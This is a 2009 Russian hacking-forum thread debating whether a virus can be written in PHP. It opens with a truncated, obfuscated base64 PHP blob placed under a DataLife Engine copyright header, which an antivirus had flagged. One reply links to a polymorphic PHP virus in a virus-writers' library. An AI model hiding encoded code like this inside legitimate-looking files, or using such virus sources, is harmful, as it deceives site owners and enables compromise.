Вирус на Php вопрос:

Discussion in 'PHP' started by N2kroot, 25 Oct 2009.

  1. N2kroot

    N2kroot New Member

    Joined:
    25 Oct 2009
    Messages:
    75
    Likes Received:
    3
    Reputations:
    0
    DrWeb Поймал php файл как вирусняк,разве можно написать вирус на php? Вот код:
    PHP:
    <?php
    /*
    =====================================================
     DataLife Engine - by SoftNews Media Group 
    -----------------------------------------------------
     http://dle-news.ru/
    -----------------------------------------------------
     Copyright (c) 2004,2009 SoftNews Media Group
    =====================================================
    */
    ?><?php $_F=__FILE__;$_X='P1ByP2puag1TYioNUzU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1DVNsIFRxVFV0ZT1sSHh3dHg9bC1sdXBseTJlcUU9Wm9sUj03dFRsZ0oyT1dsDVMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ1TbDFxcVc6YmI3Sz0teD1abwpKT2INUy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDVNsVjJXcEp0dzFxbCg
     
  2. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Нельзя, РНР интерпретируется на стороне сервера. Просто антивирус распознал опасный код, ето может быть к примеру Шелл
     
  3. d_x

    d_x Banned

    Joined:
    25 Mar 2008
    Messages:
    558
    Likes Received:
    650
    Reputations:
    210
    Вообще, можно с использованием system() и т.п., если человек запустит PHP-скрипт у себя, например, на денвере.
    PS. Код в первом посте неполный.
     
  4. ZeroByte

    ZeroByte Banned

    Joined:
    30 Jan 2009
    Messages:
    7
    Likes Received:
    3
    Reputations:
    0
    не только на denwer'е. есть exe'шники, написанные на php

    Простой php файл вирусом быть не может.
     
  5. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    exe'шники - не пишут на пыхе, а компилят
     
  6. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    А что на си, delphi, паскале ты сразу exe'шник пишешь ? :)
    Код php компилируется в ехе
     
  7. N2kroot

    N2kroot New Member

    Joined:
    25 Oct 2009
    Messages:
    75
    Likes Received:
    3
    Reputations:
    0
    Скрипт полный,просто я всё дать не могу-навярняка там ещё есть что-то,но др веб достал php из dllки,чего я делать не умею
     
  8. pSiH22oV

    pSiH22oV Elder - Старейшина

    Joined:
    29 Jun 2007
    Messages:
    28
    Likes Received:
    5
    Reputations:
    0
    o_O" ээээээээээ... вО сЛавься вика:
    как бЭ а пыхе такое реализовать моно =_="


    exe'шники? Ааа это вы про SFX в котором: php.exe + библиотека + кусокхавна.php?

    Естественно! Это всего навсего скрипт который без интерпретатора не сможет быть выполнен!
     
    2 people like this.
  9. -=Zhenek=-

    -=Zhenek=- Elder - Старейшина

    Joined:
    31 Dec 2007
    Messages:
    271
    Likes Received:
    77
    Reputations:
    1
    Нет. Можно собрать ПХП в exe фаил,а не самораспаковывающийся архив!!!
     
  10. @D_

    @D_ New Member

    Joined:
    29 Jul 2009
    Messages:
    15
    Likes Received:
    3
    Reputations:
    0
    антивирус просто увидел запакованный код и на всякий случай предупредил пользователя =) Антивирусы должны же деньги свои отрабатывать =) Панда вообще на куки ругается, мол уязвимость, вирусы =)
     
  11. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    257
    Likes Received:
    179
    Reputations:
    4
    Если учитывать что авири орут даже на простые айфреймы,то можешь сильно не беспокоится
     
  12. Exgibichi

    Exgibichi New Member

    Joined:
    7 Jul 2008
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0
    Вот тру пхп вирус даже с пременением полиморфизма.

    http://vx.netlux.org/lib/vsp05.html
     
  13. RAINUR2

    RAINUR2 New Member

    Joined:
    27 Aug 2009
    Messages:
    33
    Likes Received:
    0
    Reputations:
    0
    Ага, не думаю что можно написать вирус на php...._)))))))))
     
  14. pSiH22oV

    pSiH22oV Elder - Старейшина

    Joined:
    29 Jun 2007
    Messages:
    28
    Likes Received:
    5
    Reputations:
    0
    Хммм... я видел лишь 1-2 подобных "компилятора" и все они заточены под вин. Только вот в чём трабла - после компиляции для запуска .exe нуна куева туча библиотек =_=.

    Пример компиляторов:
    http://forum.eugen.su/showthread.php?t=81 - тру
    http://www.bambalam.se/bamcompile/
    http://www.exvision.net/miniphp/ - тру
    http://www.roadsend.com/home/index.php
    и ещё php2exe (первая попавшая ссылка - http://filez.kilu.de/php2exe.rar)

    п.с. А это не есть гуд =_="
    п.с.с НЕ знаю как вам, а по мне на пчп можно реализовать всё то или частично, что перечислено в определение вируса(который с вики). НО под одним условием, это будет сам парсер php.exe + библиотека(и) + скрипт.
     
    #14 pSiH22oV, 18 Nov 2009
    Last edited: 18 Nov 2009
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    можно, и еще как, и очень даже серьезные. Просто это нафик никому не надо, особенно тем, кто хорошо владеет php. И без всяких библиотек. Просто весить будет по любому минимум 500 кб
     
  16. Gaus

    Gaus Member

    Joined:
    8 Feb 2009
    Messages:
    136
    Likes Received:
    36
    Reputations:
    3
    php не компилируемый ЯП
     
  17. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    http://forum.antichat.ru/threadnav131232-1-10.html
    Не компилируемый, верно, интерпретируемый, но все же есть возможность загнать в EXE и сжать UPX'ом, на выходе 500кб ЕХЕ приложение.
     
  18. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Ага, а что тогда вообще без интерпретатора выполнимо ? Например,как бы ты джаваскрипт код выполнял,если бы в браузере его не было ? Я падаю с этой темы).Для любого языка программирования нужен интерпретатор,если ты не статью собрался писать на нём.Факт в том,что на сервере он есть,а в систему его надо устанавливать дополнительно,если уже нет встроенного,как для языка написания *.BAT скриптов.
     
    #18 GenTao, 20 Nov 2009
    Last edited: 20 Nov 2009
  19. pSiH22oV

    pSiH22oV Elder - Старейшина

    Joined:
    29 Jun 2007
    Messages:
    28
    Likes Received:
    5
    Reputations:
    0
    Причём тут яваскрипт? =_=" ДА, это такой же интерпретируется язык, только в отличие от php, perl, python и прочие... он выполняется на стороне клиента(браузером)! И это я всё понимаю прекрасно.
    "Для любого языка программирования нужен интерпретатор" - чеГо? 0_о" а земля тож плоская?
    БЛЯ... я в том высказывание имел ввиду, что он ИНТЕРПРЕТИРУЕМЫЙ и в отличие от компилируемых, для того чтоб что-то выполнилось нужен интерпретатор!
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    да, именно поэтому и есть php2exe всяческие, которые фактически "вшивают интерпретатор в exe" и exe становится практически ничем неотличим от других exe, кроме размера